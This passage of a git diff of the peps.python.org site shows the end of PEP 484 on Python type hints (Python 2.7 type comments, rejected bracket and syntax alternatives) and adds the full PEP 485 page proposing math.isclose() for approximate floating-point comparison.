  • Generator, used as Generator[yield_type, send_type, +return_type]. This represents the return value of generator +functions. It is a subtype of Iterable and it has additional +type variables for the type accepted by the send() method (it +is contravariant in this variable – a generator that accepts sending it +Employee instance is valid in a context where a generator is required +that accepts sending it Manager instances) and the return type of the +generator.
  • +
  • Hashable (not generic, but present for completeness)
  • +
  • ItemsView
  • +
  • Iterable
  • +
  • Iterator
  • +
  • KeysView
  • +
  • Mapping
  • +
  • MappingView
  • +
  • MutableMapping
  • +
  • MutableSequence
  • +
  • MutableSet
  • +
  • Sequence
  • +
  • Set, renamed to AbstractSet. This name change was required +because Set in the typing module means set() with +generics.
  • +
  • Sized (not generic, but present for completeness)
  • +
  • ValuesView
  • +
+

A few one-off types are defined that test for single special methods +(similar to Hashable or Sized):

+
    +
  • Reversible, to test for __reversed__
  • +
  • SupportsAbs, to test for __abs__
  • +
  • SupportsComplex, to test for __complex__
  • +
  • SupportsFloat, to test for __float__
  • +
  • SupportsInt, to test for __int__
  • +
  • SupportsRound, to test for __round__
  • +
  • SupportsBytes, to test for __bytes__
  • +
+

Convenience definitions:

+
    +
  • Optional, defined by Optional[t] == Union[t, None]
  • +
  • Text, a simple alias for str in Python 3, for unicode in Python 2
  • +
  • AnyStr, defined as TypeVar('AnyStr', Text, bytes)
  • +
  • NamedTuple, used as +NamedTuple(type_name, [(field_name, field_type), ...]) +and equivalent to +collections.namedtuple(type_name, [field_name, ...]). +This is useful to declare the types of the fields of a named tuple +type.
  • +
  • NewType, used to create unique types with little runtime overhead +UserId = NewType('UserId', int)
  • +
  • cast(), described earlier
  • +
  • @no_type_check, a decorator to disable type checking per class or +function (see below)
  • +
  • @no_type_check_decorator, a decorator to create your own decorators +with the same meaning as @no_type_check (see below)
  • +
  • @type_check_only, a decorator only available during type checking +for use in stub files (see above); marks a class or function as +unavailable during runtime
  • +
  • @overload, described earlier
  • +
  • get_type_hints(), a utility function to retrieve the type hints from a +function or method. Given a function or method object, it returns +a dict with the same format as __annotations__, but evaluating +forward references (which are given as string literals) as expressions +in the context of the original function or method definition.
  • +
  • TYPE_CHECKING, False at runtime but True to type checkers
  • +
+

I/O related types:

+
    +
  • IO (generic over AnyStr)
  • +
  • BinaryIO (a simple subtype of IO[bytes])
  • +
  • TextIO (a simple subtype of IO[str])
  • +
+

Types related to regular expressions and the re module:

+
    +
  • Match and Pattern, types of re.match() and re.compile() +results (generic over AnyStr)
  • +
+
+
+

Suggested syntax for Python 2.7 and straddling code

+

Some tools may want to support type annotations in code that must be +compatible with Python 2.7. For this purpose this PEP has a suggested +(but not mandatory) extension where function annotations are placed in +a # type: comment. Such a comment must be placed immediately +following the function header (before the docstring). An example: the +following Python 3 code:

+
def embezzle(self, account: str, funds: int = 1000000, *fake_receipts: str) -> None:
+    """Embezzle funds from account using fake receipts."""
+    <code goes here>
+
+
+

is equivalent to the following:

+
def embezzle(self, account, funds=1000000, *fake_receipts):
+    # type: (str, int, *str) -> None
+    """Embezzle funds from account using fake receipts."""
+    <code goes here>
+
+
+

Note that for methods, no type is needed for self.

+

For an argument-less method it would look like this:

+
def load_cache(self):
+    # type: () -> bool
+    <code>
+
+
+

Sometimes you want to specify the return type for a function or method +without (yet) specifying the argument types. To support this +explicitly, the argument list may be replaced with an ellipsis. +Example:

+
def send_email(address, sender, cc, bcc, subject, body):
+    # type: (...) -> bool
+    """Send an email message.  Return True if successful."""
+    <code>
+
+
+

Sometimes you have a long list of parameters and specifying their +types in a single # type: comment would be awkward. To this end +you may list the arguments one per line and add a # type: comment +per line after an argument’s associated comma, if any. +To specify the return type use the ellipsis syntax. Specifying the return +type is not mandatory and not every argument needs to be given a type. +A line with a # type: comment should contain exactly one argument. +The type comment for the last argument (if any) should precede the close +parenthesis. Example:

+
def send_email(address,     # type: Union[str, List[str]]
+               sender,      # type: str
+               cc,          # type: Optional[List[str]]
+               bcc,         # type: Optional[List[str]]
+               subject='',
+               body=None    # type: List[str]
+               ):
+    # type: (...) -> bool
+    """Send an email message.  Return True if successful."""
+    <code>
+
+
+

Notes:

+
    +
  • Tools that support this syntax should support it regardless of the +Python version being checked. This is necessary in order to support +code that straddles Python 2 and Python 3.
  • +
  • It is not allowed for an argument or return value to have both +a type annotation and a type comment.
  • +
  • When using the short form (e.g. # type: (str, int) -> None) +every argument must be accounted for, except the first argument of +instance and class methods (those are usually omitted, but it’s +allowed to include them).
  • +
  • The return type is mandatory for the short form. If in Python 3 you +would omit some argument or the return type, the Python 2 notation +should use Any.
  • +
  • When using the short form, for *args and **kwds, put 1 or 2 +stars in front of the corresponding type annotation. (As with +Python 3 annotations, the annotation here denotes the type of the +individual argument values, not of the tuple/dict that you receive +as the special argument value args or kwds.)
  • +
  • Like other type comments, any names used in the annotations must be +imported or defined by the module containing the annotation.
  • +
  • When using the short form, the entire annotation must be one line.
  • +
  • The short form may also occur on the same line as the close +parenthesis, e.g.:
    def add(a, b):  # type: (int, int) -> int
    +    return a + b
    +
    +
    +
  • +
  • Misplaced type comments will be flagged as errors by a type checker. +If necessary, such comments could be commented twice. For example:
    def f():
    +    '''Docstring'''
    +    # type: () -> None  # Error!
    +
    +def g():
    +    '''Docstring'''
    +    # # type: () -> None  # This is OK
    +
    +
    +
  • +
+

When checking Python 2.7 code, type checkers should treat the int and +long types as equivalent. For parameters typed as Text, arguments of +type str as well as unicode should be acceptable.

+
+
+

Rejected Alternatives

+

During discussion of earlier drafts of this PEP, various objections +were raised and alternatives were proposed. We discuss some of these +here and explain why we reject them.

+

Several main objections were raised.

+
+

Which brackets for generic type parameters?

+

Most people are familiar with the use of angular brackets +(e.g. List<int>) in languages like C++, Java, C# and Swift to +express the parameterization of generic types. The problem with these +is that they are really hard to parse, especially for a simple-minded +parser like Python. In most languages the ambiguities are usually +dealt with by only allowing angular brackets in specific syntactic +positions, where general expressions aren’t allowed. (And also by +using very powerful parsing techniques that can backtrack over an +arbitrary section of code.)

+

But in Python, we’d like type expressions to be (syntactically) the +same as other expressions, so that we can use e.g. variable assignment +to create type aliases. Consider this simple type expression:

+
List<int>
+
+
+

From the Python parser’s perspective, the expression begins with the +same four tokens (NAME, LESS, NAME, GREATER) as a chained comparison:

+
a < b > c  # I.e., (a < b) and (b > c)
+
+
+

We can even make up an example that could be parsed both ways:

+
a < b > [ c ]
+
+
+

Assuming we had angular brackets in the language, this could be +interpreted as either of the following two:

+
(a<b>)[c]      # I.e., (a<b>).__getitem__(c)
+a < b > ([c])  # I.e., (a < b) and (b > [c])
+
+
+

It would surely be possible to come up with a rule to disambiguate +such cases, but to most users the rules would feel arbitrary and +complex. It would also require us to dramatically change the CPython +parser (and every other parser for Python). It should be noted that +Python’s current parser is intentionally “dumb” – a simple grammar is +easier for users to reason about.

+

For all these reasons, square brackets (e.g. List[int]) are (and +have long been) the preferred syntax for generic type parameters. +They can be implemented by defining the __getitem__() method on +the metaclass, and no new syntax is required at all. This option +works in all recent versions of Python (starting with Python 2.2). +Python is not alone in this syntactic choice – generic classes in +Scala also use square brackets.

+
+
+

What about existing uses of annotations?

+

One line of argument points out that PEP 3107 explicitly supports +the use of arbitrary expressions in function annotations. The new +proposal is then considered incompatible with the specification of PEP +3107.

+

Our response to this is that, first of all, the current proposal does +not introduce any direct incompatibilities, so programs using +annotations in Python 3.4 will still work correctly and without +prejudice in Python 3.5.

+

We do hope that type hints will eventually become the sole use for +annotations, but this will require additional discussion and a +deprecation period after the initial roll-out of the typing module +with Python 3.5. The current PEP will have provisional status (see +PEP 411) until Python 3.6 is released. The fastest conceivable scheme +would introduce silent deprecation of non-type-hint annotations in +3.6, full deprecation in 3.7, and declare type hints as the only +allowed use of annotations in Python 3.8. This should give authors of +packages that use annotations plenty of time to devise another +approach, even if type hints become an overnight success.

+

(UPDATE: As of fall 2017, the timeline for the end of provisional +status for this PEP and for the typing.py module has changed, and +so has the deprecation schedule for other uses of annotations. For +the updated schedule see PEP 563.)

+

Another possible outcome would be that type hints will eventually +become the default meaning for annotations, but that there will always +remain an option to disable them. For this purpose the current +proposal defines a decorator @no_type_check which disables the +default interpretation of annotations as type hints in a given class +or function. It also defines a meta-decorator +@no_type_check_decorator which can be used to decorate a decorator +(!), causing annotations in any function or class decorated with the +latter to be ignored by the type checker.

+

There are also # type: ignore comments, and static checkers should +support configuration options to disable type checking in selected +packages.

+

Despite all these options, proposals have been circulated to allow +type hints and other forms of annotations to coexist for individual +arguments. One proposal suggests that if an annotation for a given +argument is a dictionary literal, each key represents a different form +of annotation, and the key 'type' would be use for type hints. +The problem with this idea and its variants is that the notation +becomes very “noisy” and hard to read. Also, in most cases where +existing libraries use annotations, there would be little need to +combine them with type hints. So the simpler approach of selectively +disabling type hints appears sufficient.

+
+
+

The problem of forward declarations

+

The current proposal is admittedly sub-optimal when type hints must +contain forward references. Python requires all names to be defined +by the time they are used. Apart from circular imports this is rarely +a problem: “use” here means “look up at runtime”, and with most +“forward” references there is no problem in ensuring that a name is +defined before the function using it is called.

+

The problem with type hints is that annotations (per PEP 3107, and +similar to default values) are evaluated at the time a function is +defined, and thus any names used in an annotation must be already +defined when the function is being defined. A common scenario is a +class definition whose methods need to reference the class itself in +their annotations. (More general, it can also occur with mutually +recursive classes.) This is natural for container types, for +example:

+
class Node:
+    """Binary tree node."""
+
+    def __init__(self, left: Node, right: Node):
+        self.left = left
+        self.right = right
+
+
+

As written this will not work, because of the peculiarity in Python +that class names become defined once the entire body of the class has +been executed. Our solution, which isn’t particularly elegant, but +gets the job done, is to allow using string literals in annotations. +Most of the time you won’t have to use this though – most uses of +type hints are expected to reference builtin types or types defined in +other modules.

+

A counterproposal would change the semantics of type hints so they +aren’t evaluated at runtime at all (after all, type checking happens +off-line, so why would type hints need to be evaluated at runtime at +all). This of course would run afoul of backwards compatibility, +since the Python interpreter doesn’t actually know whether a +particular annotation is meant to be a type hint or something else.

+

A compromise is possible where a __future__ import could enable +turning all annotations in a given module into string literals, as +follows:

+
from __future__ import annotations
+
+class ImSet:
+    def add(self, a: ImSet) -> List[ImSet]: ...
+
+assert ImSet.add.__annotations__ == {'a': 'ImSet', 'return': 'List[ImSet]'}
+
+
+

Such a __future__ import statement may be proposed in a separate +PEP.

+

(UPDATE: That __future__ import statement and its consequences +are discussed in PEP 563.)

+
+
+

The double colon

+

A few creative souls have tried to invent solutions for this problem. +For example, it was proposed to use a double colon (::) for type +hints, solving two problems at once: disambiguating between type hints +and other annotations, and changing the semantics to preclude runtime +evaluation. There are several things wrong with this idea, however.

+
    +
  • It’s ugly. The single colon in Python has many uses, and all of +them look familiar because they resemble the use of the colon in +English text. This is a general rule of thumb by which Python +abides for most forms of punctuation; the exceptions are typically +well known from other programming languages. But this use of :: +is unheard of in English, and in other languages (e.g. C++) it is +used as a scoping operator, which is a very different beast. In +contrast, the single colon for type hints reads naturally – and no +wonder, since it was carefully designed for this purpose +(the idea +long predates PEP 3107). It is also used in the same +fashion in other languages from Pascal to Swift.
  • +
  • What would you do for return type annotations?
  • +
  • It’s actually a feature that type hints are evaluated at runtime.
      +
    • Making type hints available at runtime allows runtime type +checkers to be built on top of type hints.
    • +
    • It catches mistakes even when the type checker is not run. Since +it is a separate program, users may choose not to run it (or even +install it), but might still want to use type hints as a concise +form of documentation. Broken type hints are no use even for +documentation.
    • +
    +
  • +
  • Because it’s new syntax, using the double colon for type hints would +limit them to code that works with Python 3.5 only. By using +existing syntax, the current proposal can easily work for older +versions of Python 3. (And in fact mypy supports Python 3.2 and +newer.)
  • +
  • If type hints become successful we may well decide to add new syntax +in the future to declare the type for variables, for example +var age: int = 42. If we were to use a double colon for +argument type hints, for consistency we’d have to use the same +convention for future syntax, perpetuating the ugliness.
  • +
+
+
+

Other forms of new syntax

+

A few other forms of alternative syntax have been proposed, e.g. the +introduction of a where keyword, and Cobra-inspired +requires clauses. But these all share a problem with the double +colon: they won’t work for earlier versions of Python 3. The same +would apply to a new __future__ import.

+
+
+

Other backwards compatible conventions

+

The ideas put forward include:

+
    +
  • A decorator, e.g. @typehints(name=str, returns=str). This could +work, but it’s pretty verbose (an extra line, and the argument names +must be repeated), and a far cry in elegance from the PEP 3107 +notation.
  • +
  • Stub files. We do want stub files, but they are primarily useful +for adding type hints to existing code that doesn’t lend itself to +adding type hints, e.g. 3rd party packages, code that needs to +support both Python 2 and Python 3, and especially extension +modules. For most situations, having the annotations in line with +the function definitions makes them much more useful.
  • +
  • Docstrings. There is an existing convention for docstrings, based +on the Sphinx notation (:type arg1: description). This is +pretty verbose (an extra line per parameter), and not very elegant. +We could also make up something new, but the annotation syntax is +hard to beat (because it was designed for this very purpose).
  • +
+

It’s also been proposed to simply wait another release. But what +problem would that solve? It would just be procrastination.

+
+
+
+

PEP Development Process

+

A live draft for this PEP lives on GitHub. There is also an +issue tracker, where much of the technical discussion takes +place.

+

The draft on GitHub is updated regularly in small increments. The +official PEPS repo is (usually) only updated when a new draft +is posted to python-dev.

+
+
+

Acknowledgements

+

This document could not be completed without valuable input, +encouragement and advice from Jim Baker, Jeremy Siek, Michael Matson +Vitousek, Andrey Vlasovskikh, Radomir Dopieralski, Peter Ludemann, +and the BDFL-Delegate, Mark Shannon.

+

Influences include existing languages, libraries and frameworks +mentioned in PEP 482. Many thanks to their creators, in alphabetical +order: Stefan Behnel, William Edwards, Greg Ewing, Larry Hastings, +Anders Hejlsberg, Alok Menghrajani, Travis E. Oliphant, Joe Pamer, +Raoul-Gabriel Urma, and Julien Verlaguet.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0484.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0485/index.html b/pep-0485/index.html new file mode 100644 index 00000000000..fc9a06571e4 --- /dev/null +++ b/pep-0485/index.html @@ -0,0 +1,717 @@ + + + + + + + + PEP 485 – A Function for testing approximate equality | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 485 – A Function for testing approximate equality

+
+
Author:
+
Christopher Barker <PythonCHB at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
20-Jan-2015
+
Python-Version:
+
3.5
+
Post-History:
+

+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the addition of an isclose() function to the standard +library math module that determines whether one value is approximately equal +or “close” to another value.

+
+
+

Rationale

+

Floating point values contain limited precision, which results in +their being unable to exactly represent some values, and for errors to +accumulate with repeated computation. As a result, it is common +advice to only use an equality comparison in very specific situations. +Often an inequality comparison fits the bill, but there are times +(often in testing) where the programmer wants to determine whether a +computed value is “close” to an expected value, without requiring them +to be exactly equal. This is common enough, particularly in testing, +and not always obvious how to do it, that it would be useful addition to +the standard library.

+
+

Existing Implementations

+

The standard library includes the unittest.TestCase.assertAlmostEqual +method, but it:

+
    +
  • Is buried in the unittest.TestCase class
  • +
  • Is an assertion, so you can’t use it as a general test at the command +line, etc. (easily)
  • +
  • Is an absolute difference test. Often the measure of difference +requires, particularly for floating point numbers, a relative error, +i.e. “Are these two values within x% of each-other?”, rather than an +absolute error. Particularly when the magnitude of the values is +unknown a priori.
  • +
+

The numpy package has the allclose() and isclose() functions, +but they are only available with numpy.

+

The statistics package tests include an implementation, used for its +unit tests.

+

One can also find discussion and sample implementations on Stack +Overflow and other help sites.

+

Many other non-python systems provide such a test, including the Boost C++ +library and the APL language [4].

+

These existing implementations indicate that this is a common need and +not trivial to write oneself, making it a candidate for the standard +library.

+
+
+
+

Proposed Implementation

+

NOTE: this PEP is the result of extended discussions on the +python-ideas list [1].

+

The new function will go into the math module, and have the following +signature:

+
isclose(a, b, rel_tol=1e-9, abs_tol=0.0)
+
+
+

a and b: are the two values to be tested to relative closeness

+

rel_tol: is the relative tolerance – it is the amount of error +allowed, relative to the larger absolute value of a or b. For example, +to set a tolerance of 5%, pass tol=0.05. The default tolerance is 1e-9, +which assures that the two values are the same within about 9 decimal +digits. rel_tol must be greater than 0.0

+

abs_tol: is a minimum absolute tolerance level – useful for +comparisons near zero.

+

Modulo error checking, etc, the function will return the result of:

+
abs(a-b) <= max( rel_tol * max(abs(a), abs(b)), abs_tol )
+
+
+

The name, isclose, is selected for consistency with the existing +isnan and isinf.

+
+

Handling of non-finite numbers

+

The IEEE 754 special values of NaN, inf, and -inf will be handled +according to IEEE rules. Specifically, NaN is not considered close to +any other value, including NaN. inf and -inf are only considered close +to themselves.

+
+
+

Non-float types

+

The primary use-case is expected to be floating point numbers. +However, users may want to compare other numeric types similarly. In +theory, it should work for any type that supports abs(), +multiplication, comparisons, and subtraction. However, the implementation +in the math module is written in C, and thus can not (easily) use python’s +duck typing. Rather, the values passed into the function will be converted +to the float type before the calculation is performed. Passing in types +(or values) that cannot be converted to floats will raise an appropriate +Exception (TypeError, ValueError, or OverflowError).

+

The code will be tested to accommodate at least some values of these types:

+
    +
  • Decimal
  • +
  • int
  • +
  • Fraction
  • +
  • complex: For complex, a companion function will be added to the +cmath module. In cmath.isclose(), the tolerances are specified +as floats, and the absolute value of the complex values +will be used for scaling and comparison. If a complex tolerance is +passed in, the absolute value will be used as the tolerance.
  • +
+

NOTE: it may make sense to add a Decimal.isclose() that works properly and +completely with the decimal type, but that is not included as part of this PEP.

+
+
+

Behavior near zero

+

Relative comparison is problematic if either value is zero. By +definition, no value is small relative to zero. And computationally, +if either value is zero, the difference is the absolute value of the +other value, and the computed absolute tolerance will be rel_tol +times that value. When rel_tol is less than one, the difference will +never be less than the tolerance.

+

However, while mathematically correct, there are many use cases where +a user will need to know if a computed value is “close” to zero. This +calls for an absolute tolerance test. If the user needs to call this +function inside a loop or comprehension, where some, but not all, of +the expected values may be zero, it is important that both a relative +tolerance and absolute tolerance can be tested for with a single +function with a single set of parameters.

+

There is a similar issue if the two values to be compared straddle zero: +if a is approximately equal to -b, then a and b will never be computed +as “close”.

+

To handle this case, an optional parameter, abs_tol can be +used to set a minimum tolerance used in the case of very small or zero +computed relative tolerance. That is, the values will be always be +considered close if the difference between them is less than +abs_tol

+

The default absolute tolerance value is set to zero because there is +no value that is appropriate for the general case. It is impossible to +know an appropriate value without knowing the likely values expected +for a given use case. If all the values tested are on order of one, +then a value of about 1e-9 might be appropriate, but that would be far +too large if expected values are on order of 1e-9 or smaller.

+

Any non-zero default might result in user’s tests passing totally +inappropriately. If, on the other hand, a test against zero fails the +first time with defaults, a user will be prompted to select an +appropriate value for the problem at hand in order to get the test to +pass.

+

NOTE: that the author of this PEP has resolved to go back over many of +his tests that use the numpy allclose() function, which provides +a default absolute tolerance, and make sure that the default value is +appropriate.

+

If the user sets the rel_tol parameter to 0.0, then only the +absolute tolerance will effect the result. While not the goal of the +function, it does allow it to be used as a purely absolute tolerance +check as well.

+
+
+

Implementation

+

A sample implementation in python is available (as of Jan 22, 2015) on +gitHub:

+

https://github.com/PythonCHB/close_pep/blob/master/is_close.py

+

This implementation has a flag that lets the user select which +relative tolerance test to apply – this PEP does not suggest that +that be retained, but rather that the weak test be selected.

+

There are also drafts of this PEP and test code, etc. there:

+

https://github.com/PythonCHB/close_pep

+
+
+
+

Relative Difference

+

There are essentially two ways to think about how close two numbers +are to each-other:

+

Absolute difference: simply abs(a-b)

+

Relative difference: abs(a-b)/scale_factor [2].

+

The absolute difference is trivial enough that this proposal focuses +on the relative difference.

+

Usually, the scale factor is some function of the values under +consideration, for instance:

+
    +
  1. The absolute value of one of the input values
  2. +
  3. The maximum absolute value of the two
  4. +
  5. The minimum absolute value of the two.
  6. +
  7. The absolute value of the arithmetic mean of the two
  8. +
+

These lead to the following possibilities for determining if two +values, a and b, are close to each other.

+
    +
  1. abs(a-b) <= tol*abs(a)
  2. +
  3. abs(a-b) <= tol * max( abs(a), abs(b) )
  4. +
  5. abs(a-b) <= tol * min( abs(a), abs(b) )
  6. +
  7. abs(a-b) <= tol * abs(a + b)/2
  8. +
+

NOTE: (2) and (3) can also be written as:

+
    +
  1. (abs(a-b) <= abs(tol*a)) or (abs(a-b) <= abs(tol*b))
  2. +
  3. (abs(a-b) <= abs(tol*a)) and (abs(a-b) <= abs(tol*b))
  4. +
+

(Boost refers to these as the “weak” and “strong” formulations [3]) +These can be a tiny bit more computationally efficient, and thus are +used in the example code.

+

Each of these formulations can lead to slightly different results. +However, if the tolerance value is small, the differences are quite +small. In fact, often less than available floating point precision.

+
+

How much difference does it make?

+

When selecting a method to determine closeness, one might want to know +how much of a difference it could make to use one test or the other +– i.e. how many values are there (or what range of values) that will +pass one test, but not the other.

+

The largest difference is between options (2) and (3) where the +allowable absolute difference is scaled by either the larger or +smaller of the values.

+

Define delta to be the difference between the allowable absolute +tolerance defined by the larger value and that defined by the smaller +value. That is, the amount that the two input values need to be +different in order to get a different result from the two tests. +tol is the relative tolerance value.

+

Assume that a is the larger value and that both a and b +are positive, to make the analysis a bit easier. delta is +therefore:

+
delta = tol * (a-b)
+
+
+

or:

+
delta / tol = (a-b)
+
+
+

The largest absolute difference that would pass the test: (a-b), +equals the tolerance times the larger value:

+
(a-b) = tol * a
+
+
+

Substituting into the expression for delta:

+
delta / tol = tol * a
+
+
+

so:

+
delta = tol**2 * a
+
+
+

For example, for a = 10, b = 9, tol = 0.1 (10%):

+

maximum tolerance tol * a == 0.1 * 10 == 1.0

+

minimum tolerance tol * b == 0.1 * 9.0 == 0.9

+

delta = (1.0 - 0.9) = 0.1 or tol**2 * a = 0.1**2 * 10 = .1

+

The absolute difference between the maximum and minimum tolerance +tests in this case could be substantial. However, the primary use +case for the proposed function is testing the results of computations. +In that case a relative tolerance is likely to be selected of much +smaller magnitude.

+

For example, a relative tolerance of 1e-8 is about half the +precision available in a python float. In that case, the difference +between the two tests is 1e-8**2 * a or 1e-16 * a, which is +close to the limit of precision of a python float. If the relative +tolerance is set to the proposed default of 1e-9 (or smaller), the +difference between the two tests will be lost to the limits of +precision of floating point. That is, each of the four methods will +yield exactly the same results for all values of a and b.

+

In addition, in common use, tolerances are defined to 1 significant +figure – that is, 1e-9 is specifying about 9 decimal digits of +accuracy. So the difference between the various possible tests is well +below the precision to which the tolerance is specified.

+
+
+

Symmetry

+

A relative comparison can be either symmetric or non-symmetric. For a +symmetric algorithm:

+

isclose(a,b) is always the same as isclose(b,a)

+

If a relative closeness test uses only one of the values (such as (1) +above), then the result is asymmetric, i.e. isclose(a,b) is not +necessarily the same as isclose(b,a).

+

Which approach is most appropriate depends on what question is being +asked. If the question is: “are these two numbers close to each +other?”, there is no obvious ordering, and a symmetric test is most +appropriate.

+

However, if the question is: “Is the computed value within x% of this +known value?”, then it is appropriate to scale the tolerance to the +known value, and an asymmetric test is most appropriate.

+

From the previous section, it is clear that either approach would +yield the same or similar results in the common use cases. In that +case, the goal of this proposal is to provide a function that is least +likely to produce surprising results.

+

The symmetric approach provide an appealing consistency – it +mirrors the symmetry of equality, and is less likely to confuse +people. A symmetric test also relieves the user of the need to think +about the order in which to set the arguments. It was also pointed +out that there may be some cases where the order of evaluation may not +be well defined, for instance in the case of comparing a set of values +all against each other.

+

There may be cases when a user does need to know that a value is +within a particular range of a known value. In that case, it is easy +enough to simply write the test directly:

+
if a-b <= tol*a:
+
+
+

(assuming a > b in this case). There is little need to provide a +function for this particular case.

+

This proposal uses a symmetric test.

+
+
+

Which symmetric test?

+

There are three symmetric tests considered:

+

The case that uses the arithmetic mean of the two values requires that +the value be either added together before dividing by 2, which could +result in extra overflow to inf for very large numbers, or require +each value to be divided by two before being added together, which +could result in underflow to zero for very small numbers. This effect +would only occur at the very limit of float values, but it was decided +there was no benefit to the method worth reducing the range of +functionality or adding the complexity of checking values to determine +the order of computation.

+

This leaves the boost “weak” test (2)– or using the larger value to +scale the tolerance, or the Boost “strong” (3) test, which uses the +smaller of the values to scale the tolerance. For small tolerance, +they yield the same result, but this proposal uses the boost “weak” +test case: it is symmetric and provides a more useful result for very +large tolerances.

+
+
+

Large Tolerances

+

The most common use case is expected to be small tolerances – on order of the +default 1e-9. However, there may be use cases where a user wants to know if two +fairly disparate values are within a particular range of each other: “is a +within 200% (rel_tol = 2.0) of b? In this case, the strong test would never +indicate that two values are within that range of each other if one of them is +zero. The weak case, however would use the larger (non-zero) value for the +test, and thus return true if one value is zero. For example: is 0 within 200% +of 10? 200% of ten is 20, so the range within 200% of ten is -10 to +30. Zero +falls within that range, so it will return True.

+
+
+
+

Defaults

+

Default values are required for the relative and absolute tolerance.

+
+

Relative Tolerance Default

+

The relative tolerance required for two values to be considered +“close” is entirely use-case dependent. Nevertheless, the relative +tolerance needs to be greater than 1e-16 (approximate precision of a +python float). The value of 1e-9 was selected because it is the +largest relative tolerance for which the various possible methods will +yield the same result, and it is also about half of the precision +available to a python float. In the general case, a good numerical +algorithm is not expected to lose more than about half of available +digits of accuracy, and if a much larger tolerance is acceptable, the +user should be considering the proper value in that case. Thus 1e-9 is +expected to “just work” for many cases.

+
+
+

Absolute tolerance default

+

The absolute tolerance value will be used primarily for comparing to +zero. The absolute tolerance required to determine if a value is +“close” to zero is entirely use-case dependent. There is also +essentially no bounds to the useful range – expected values would +conceivably be anywhere within the limits of a python float. Thus a +default of 0.0 is selected.

+

If, for a given use case, a user needs to compare to zero, the test +will be guaranteed to fail the first time, and the user can select an +appropriate value.

+

It was suggested that comparing to zero is, in fact, a common use case +(evidence suggest that the numpy functions are often used with zero). +In this case, it would be desirable to have a “useful” default. Values +around 1e-8 were suggested, being about half of floating point +precision for values of around value 1.

+

However, to quote The Zen: “In the face of ambiguity, refuse the +temptation to guess.” Guessing that users will most often be concerned +with values close to 1.0 would lead to spurious passing tests when used +with smaller values – this is potentially more damaging than +requiring the user to thoughtfully select an appropriate value.

+
+
+
+

Expected Uses

+

The primary expected use case is various forms of testing – “are the +results computed near what I expect as a result?” This sort of test +may or may not be part of a formal unit testing suite. Such testing +could be used one-off at the command line, in an IPython notebook, +part of doctests, or simple asserts in an if __name__ == "__main__" +block.

+

It would also be an appropriate function to use for the termination +criteria for a simple iterative solution to an implicit function:

+
guess = something
+while True:
+    new_guess = implicit_function(guess, *args)
+    if isclose(new_guess, guess):
+        break
+    guess = new_guess
+
+
+
+

Inappropriate uses

+

One use case for floating point comparison is testing the accuracy of +a numerical algorithm. However, in this case, the numerical analyst +ideally would be doing careful error propagation analysis, and should +understand exactly what to test for. It is also likely that ULP (Unit +in the Last Place) comparison may be called for. While this function +may prove useful in such situations, It is not intended to be used in +that way without careful consideration.

+
+
+
+

Other Approaches

+
+

unittest.TestCase.assertAlmostEqual

+

(https://docs.python.org/3/library/unittest.html#unittest.TestCase.assertAlmostEqual)

+

Tests that values are approximately (or not approximately) equal by +computing the difference, rounding to the given number of decimal +places (default 7), and comparing to zero.

+

This method is purely an absolute tolerance test, and does not address +the need for a relative tolerance test.

+
+
+

numpy isclose()

+

http://docs.scipy.org/doc/numpy-dev/reference/generated/numpy.isclose.html

+

The numpy package provides the vectorized functions isclose() and +allclose(), for similar use cases as this proposal:

+

isclose(a, b, rtol=1e-05, atol=1e-08, equal_nan=False)

+
+
Returns a boolean array where two arrays are element-wise equal +within a tolerance.

The tolerance values are positive, typically very small numbers. +The relative difference (rtol * abs(b)) and the absolute +difference atol are added together to compare against the +absolute difference between a and b

+
+

In this approach, the absolute and relative tolerance are added +together, rather than the or method used in this proposal. This is +computationally more simple, and if relative tolerance is larger than +the absolute tolerance, then the addition will have no effect. However, +if the absolute and relative tolerances are of similar magnitude, then +the allowed difference will be about twice as large as expected.

+

This makes the function harder to understand, with no computational +advantage in this context.

+

Even more critically, if the values passed in are small compared to +the absolute tolerance, then the relative tolerance will be +completely swamped, perhaps unexpectedly.

+

This is why, in this proposal, the absolute tolerance defaults to zero +– the user will be required to choose a value appropriate for the +values at hand.

+
+
+

Boost floating-point comparison

+

The Boost project ( [3] ) provides a floating point comparison +function. It is a symmetric approach, with both “weak” (larger of the +two relative errors) and “strong” (smaller of the two relative errors) +options. This proposal uses the Boost “weak” approach. There is no +need to complicate the API by providing the option to select different +methods when the results will be similar in most cases, and the user +is unlikely to know which to select in any case.

+
+
+

Alternate Proposals

+
+

A Recipe

+

The primary alternate proposal was to not provide a standard library +function at all, but rather, provide a recipe for users to refer to. +This would have the advantage that the recipe could provide and +explain the various options, and let the user select that which is +most appropriate. However, that would require anyone needing such a +test to, at the very least, copy the function into their code base, +and select the comparison method to use.

+
+
+

zero_tol

+

One possibility was to provide a zero tolerance parameter, rather than +the absolute tolerance parameter. This would be an absolute tolerance +that would only be applied in the case of one of the arguments being +exactly zero. This would have the advantage of retaining the full +relative tolerance behavior for all non-zero values, while allowing +tests against zero to work. However, it would also result in the +potentially surprising result that a small value could be “close” to +zero, but not “close” to an even smaller value. e.g., 1e-10 is “close” +to zero, but not “close” to 1e-11.

+
+
+

No absolute tolerance

+

Given the issues with comparing to zero, another possibility would +have been to only provide a relative tolerance, and let comparison to +zero fail. In this case, the user would need to do a simple absolute +test: abs(val) < zero_tol in the case where the comparison involved +zero.

+

However, this would not allow the same call to be used for a sequence +of values, such as in a loop or comprehension. Making the function far +less useful. It is noted that the default abs_tol=0.0 achieves the +same effect if the default is not overridden.

+
+
+

Other tests

+

The other tests considered are all discussed in the Relative Error +section above.

+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0485.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
